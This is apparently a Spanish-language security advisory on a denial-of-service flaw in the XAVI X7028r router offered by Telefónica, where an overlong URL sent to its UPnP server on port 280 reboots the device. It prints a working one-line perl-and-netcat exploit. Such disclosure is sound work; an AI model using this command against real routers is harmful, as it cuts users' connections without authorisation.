|
Denegación de servicio en XAVI X7028r Wireless router
Asunto
Denegación de servicio en XAVI X7028r Wireless router
Fecha
21-7-03
Producto afectado
Descripción
Telefónica ofrece a sus clientes en España y Latinoamérica la
posibilidad de contratar su servicio ADSL con un router inalámbrico fabricado por
XAVI.
El router es también un dispositivo Universal Plug and play que responde a las
peticiones M-SEARCH anunciando una URL en su puerto 280 tcp con sus características y páginas xml
para interactuar con él . Debido a que no comprueba que la longitud de la URL en
el servidor UPnP (Universal Plug & Play) que el router tiene en el puerto TCP/280 no
supera el límite del búfer, puede ser reiniciado por un usuario de la red interna o
remotamente con la interacción de un usuario que utilice XAVI (haciendo que pulse un enlace o visite una web).
Esto ocurre con los métodos GET, HEAD y TRACE con diferentes longitudes
de URL y no es necesario estar autenticado para provocar el reinicio del router. La conexión
PPP (Point to Point Protocol) tendrá que ser cortada y comenzada de nuevo para un
funcionamiento normal del router.
Exploit
perl -e 'print "GET /"."A"x1008;print " HTTP/1.1\nHost:192.168.1.1:280\n\n\n\n"' | netcat -v -n 192.168.1.1 280
Créditos
Esta vulnerabilidad fue descubierta por David F.
Madrid, redactor de Nautopía.
-Vulnerabilidades-
|
